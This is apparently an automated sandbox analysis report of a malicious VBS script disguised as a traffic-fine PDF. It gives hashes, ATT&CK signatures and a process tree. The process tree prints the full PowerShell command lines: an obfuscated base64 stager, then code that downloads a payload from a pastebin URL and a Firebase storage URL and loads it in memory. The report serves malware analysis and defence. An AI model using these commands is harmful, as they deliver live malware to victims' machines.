Overview

overview

10

Static

static

1

IMAGENES F...DF.vbs

windows7-x64

10

IMAGENES F...DF.vbs

windows10-2004-x64

10

Resubmissions

08-12-2024 20:18

241208-y3bktatmfw 10

23-11-2024 19:37

241123-yb3vzssnfz 10

Analysis

  • max time kernel
    118s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    08-12-2024 20:18

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    IMAGENES FOTO COMPARENDOS SIMIT INFRACCIONES DETALLES #2024-666663265889-999658959-PDF.vbs

  • Size

    207KB

  • MD5

    6fb4803325e9551ee65380e39a58b250

  • SHA1

    8fd05fec3c193676864b0eec7a4d5ba1a118b4ea

  • SHA256

    f2210b872fa03ec869ad401139fb07405005043d9adeae4ae9bcc0a837b9b249

  • SHA512

    23c4922fc122038050e1cb37fe728910d5d013bec36a3aecf7ff83148ade88e6df31f4e554a104e17e301dfd7690fe7abfebbba12522c95e422d9c7e3089f899

  • SSDEEP

    384:2747Y7474747Y7474747Y7474747Y7474747Y7474747Y7474747Y7474747Y74Y:Clz/X

Score
10/10
defense_evasiondiscoveryexecution

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://pastebin.com/raw/0FK5ax2D

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

    defense_evasion
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IMAGENES FOTO COMPARENDOS SIMIT INFRACCIONES DETALLES #2024-666663265889-999658959-PDF.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1900
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★UwBl★HI★dgBp★GM★ZQBQ★G8★aQBu★HQ★TQBh★G4★YQBn★GU★cgBd★Do★OgBT★GU★YwB1★HI★aQB0★Hk★U★By★G8★d★Bv★GM★bwBs★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★FM★ZQBj★HU★cgBp★HQ★eQBQ★HI★bwB0★G8★YwBv★Gw★V★B5★H★★ZQBd★Do★OgBU★Gw★cw★x★DI★Ow★k★EM★QwBS★Gg★bQ★g★D0★I★★n★Gg★d★B0★H★★cw★6★C8★LwBw★GE★cwB0★GU★YgBp★G4★LgBj★G8★bQ★v★HI★YQB3★C8★M★BG★Es★NQBh★Hg★MgBE★Cc★I★★7★CQ★Zg★g★D0★I★★o★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DE★LgB0★Hg★d★★n★Ck★I★★7★Ek★bgB2★G8★awBl★C0★VwBl★GI★UgBl★HE★dQBl★HM★d★★g★C0★VQBS★Ek★I★★k★EM★QwBS★Gg★bQ★g★C0★TwB1★HQ★RgBp★Gw★ZQ★g★CQ★Zg★g★C0★VQBz★GU★QgBh★HM★aQBj★F★★YQBy★HM★aQBu★Gc★I★★7★GM★bQBk★C4★ZQB4★GU★I★★v★GM★I★★7★H★★aQBu★Gc★I★★x★DI★Nw★u★D★★Lg★w★C4★MQ★g★Ds★c★Bv★Hc★ZQBy★HM★a★Bl★Gw★b★★u★GU★e★Bl★C★★LQBj★G8★bQBt★GE★bgBk★C★★ew★k★GY★I★★9★C★★K★Bb★FM★eQBz★HQ★ZQBt★C4★SQBP★C4★U★Bh★HQ★a★Bd★Do★OgBH★GU★d★BU★GU★bQBw★F★★YQB0★Gg★K★★p★C★★Kw★g★Cc★Z★Bs★Gw★M★★x★C4★d★B4★HQ★Jw★p★C★★Ow★k★FE★U★B0★GE★dg★g★D0★I★★o★C★★RwBl★HQ★LQBD★G8★bgB0★GU★bgB0★C★★LQBQ★GE★d★Bo★C★★J★Bm★C★★KQ★g★Ds★SQBu★HY★bwBr★GU★LQBX★GU★YgBS★GU★cQB1★GU★cwB0★C★★LQBV★FI★SQ★g★CQ★UQBQ★HQ★YQB2★C★★LQBP★HU★d★BG★Gk★b★Bl★C★★J★Bm★C★★LQBV★HM★ZQBC★GE★cwBp★GM★U★Bh★HI★cwBp★G4★ZwB9★C★★Ow★k★FE★U★B0★GE★dg★g★D0★I★★o★C★★RwBl★HQ★LQBD★G8★bgB0★GU★bgB0★C★★LQBQ★GE★d★Bo★C★★J★Bm★C★★KQ★g★Ds★J★Bm★Gg★b★Bv★Hc★I★★9★C★★Jw★w★Cc★I★★7★CQ★a★B1★HY★YwBq★C★★PQ★g★Cc★JQBK★Gs★UQBh★HM★R★Bm★Gc★cgBU★Gc★JQ★n★C★★OwBb★EI★eQB0★GU★WwBd★F0★I★★k★Gs★awBr★HU★eQ★g★D0★I★Bb★HM★eQBz★HQ★ZQBt★C4★QwBv★G4★dgBl★HI★d★Bd★Do★OgBG★HI★bwBt★EI★YQBz★GU★Ng★0★FM★d★By★Gk★bgBn★Cg★I★★k★FE★U★B0★GE★dg★u★HI★ZQBw★Gw★YQBj★GU★K★★n★CQ★J★★n★Cw★JwBB★Cc★KQ★g★Ck★I★★7★Fs★UwB5★HM★d★Bl★G0★LgBB★H★★c★BE★G8★bQBh★Gk★bgBd★Do★OgBD★HU★cgBy★GU★bgB0★EQ★bwBt★GE★aQBu★C4★T★Bv★GE★Z★★o★CQ★awBr★Gs★dQB5★Ck★LgBH★GU★d★BU★Hk★c★Bl★Cg★JwBU★GU★a★B1★Gw★YwBo★GU★cwBY★Hg★W★B4★Hg★LgBD★Gw★YQBz★HM★MQ★n★Ck★LgBH★GU★d★BN★GU★d★Bo★G8★Z★★o★Cc★TQBz★HE★QgBJ★GI★WQ★n★Ck★LgBJ★G4★dgBv★Gs★ZQ★o★CQ★bgB1★Gw★b★★s★C★★WwBv★GI★agBl★GM★d★Bb★F0★XQ★g★Cg★Jw★w★DM★OQ★1★D★★N★★4★Dc★YQ★w★DQ★Zg★t★GU★YgBk★GE★LQBh★D★★ZQ★0★C0★Yw★0★DM★OQ★t★Dc★ZQBm★DY★Nw★x★GM★ZQ★9★G4★ZQBr★G8★d★★m★GE★aQBk★GU★bQ★9★HQ★b★Bh★D8★d★B4★HQ★LgBE★EM★R★BD★EQ★QwBE★EM★R★BD★EQ★Rg★y★CU★UwBB★FQ★T★BV★E0★M★★y★CU★UwBF★FQ★UgBP★F★★UwBO★EE★UgBU★FM★TgBJ★E0★M★★y★CU★V★BJ★E0★SQBT★C8★bw★v★G0★bwBj★C4★d★Bv★H★★cwBw★H★★YQ★u★GE★O★★x★DM★MQ★t★GE★YQBz★G8★bwBv★HI★cgBy★HI★LwBi★C8★M★B2★C8★bQBv★GM★LgBz★Gk★c★Bh★GU★b★Bn★G8★bwBn★C4★ZQBn★GE★cgBv★HQ★cwBl★HM★YQBi★GU★cgBp★GY★Lw★v★Do★cwBw★HQ★d★Bo★Cc★I★★s★C★★J★Bo★HU★dgBj★Go★I★★s★C★★JwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★LQ★t★C0★LQ★t★C0★LQ★n★Cw★I★★k★GY★a★Bs★G8★dw★s★C★★Jw★x★Cc★L★★g★Cc★UgBv★GQ★YQ★n★C★★KQ★p★Ds★';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('★','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\Admin\AppData\Local\Temp\IMAGENES FOTO COMPARENDOS SIMIT INFRACCIONES DETALLES #2024-666663265889-999658959-PDF.vbs');powershell $Yolopolhggobek;
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2696
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/0FK5ax2D' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$fhlow = '0' ;$huvcj = 'C:\Users\Admin\AppData\Local\Temp\IMAGENES FOTO COMPARENDOS SIMIT INFRACCIONES DETALLES #2024-666663265889-999658959-PDF.vbs' ;[Byte[]] $kkkuy = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($kkkuy).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('03950487a04f-ebda-a0e4-c439-7ef671ce=nekot&aidem=tla?txt.DCDCDCDCDCDF2%SATLUM02%SETROPSNARTSNIM02%TIMIS/o/moc.topsppa.a8131-aasooorrrr/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $huvcj , '____________________________________________-------', $fhlow, '1', 'Roda' ));"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2852
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c
          4⤵
            PID:2224
          • C:\Windows\system32\PING.EXE
            "C:\Windows\system32\PING.EXE" 127.0.0.1
            4⤵
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:2688
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2548

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
      Filesize

      7KB

      MD5

      e740cb3c84505baacb037c103c89d43f

      SHA1

      3ef8e29c51f22f37b3116bf465eef9d0d4590101

      SHA256

      d1fcb3929d0c17b894e0cfc24aa39ef1a8c64b62927e575b6e07eb542553beb2

      SHA512

      5ba50e3584cca10c65a30d7a1df0afa5b1f22894edf1e6141b6547db5e38499adc359b58c35f3f90645196962807b8f60b3accf9638e28927321bfe5c1148c56

      Download Submit

    • memory/2696-4-0x000007FEF60CE000-0x000007FEF60CF000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2696-7-0x0000000001F80000-0x0000000001F88000-memory.dmp

      Filesize

      32KB

      Download

    • memory/2696-6-0x000007FEF5E10000-0x000007FEF67AD000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2696-5-0x000000001B510000-0x000000001B7F2000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/2696-8-0x000007FEF5E10000-0x000007FEF67AD000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2696-9-0x000007FEF5E10000-0x000007FEF67AD000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2696-10-0x000007FEF5E10000-0x000007FEF67AD000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2696-12-0x000007FEF5E10000-0x000007FEF67AD000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2696-22-0x000007FEF5E10000-0x000007FEF67AD000-memory.dmp

      Filesize

      9.6MB

      Download